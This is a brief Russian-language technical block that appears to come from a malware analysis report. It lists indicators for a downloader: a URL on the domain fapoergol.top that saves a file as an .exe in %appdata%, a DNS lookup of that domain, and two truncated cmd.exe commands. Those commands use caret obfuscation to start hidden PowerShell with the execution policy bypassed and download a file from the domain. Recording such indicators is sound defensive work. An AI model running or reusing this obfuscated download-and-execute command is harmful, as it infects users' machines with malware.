Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^o^WER^s^H^El^l.^Ex^E -ex^E^C^UT^io^n^P^oLICy^ BYpaS^S -NOproFilE -w^INdOW^sTYLe HiDDEN ^(N^EW^-OBj^ecT sYsT^eM.neT.WEB^c^L^i^eN^T).^DowNLoA^DF^IlE('http://www.fapoergol.top/read...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /C "p^o^WER^s^H^El^l.^Ex^E -ex^E^C^UT^io^n^P^oLICy^ BYpaS^S -NOproFilE -w^INdOW^sTYLe HiDDEN ^(N^EW^-OBj^ecT sYsT^eM.neT.WEB^c^L^i^eN^T).^DowNLoA^DF^IlE('http://www.fapoergol.top/read...' (со скрытым окном)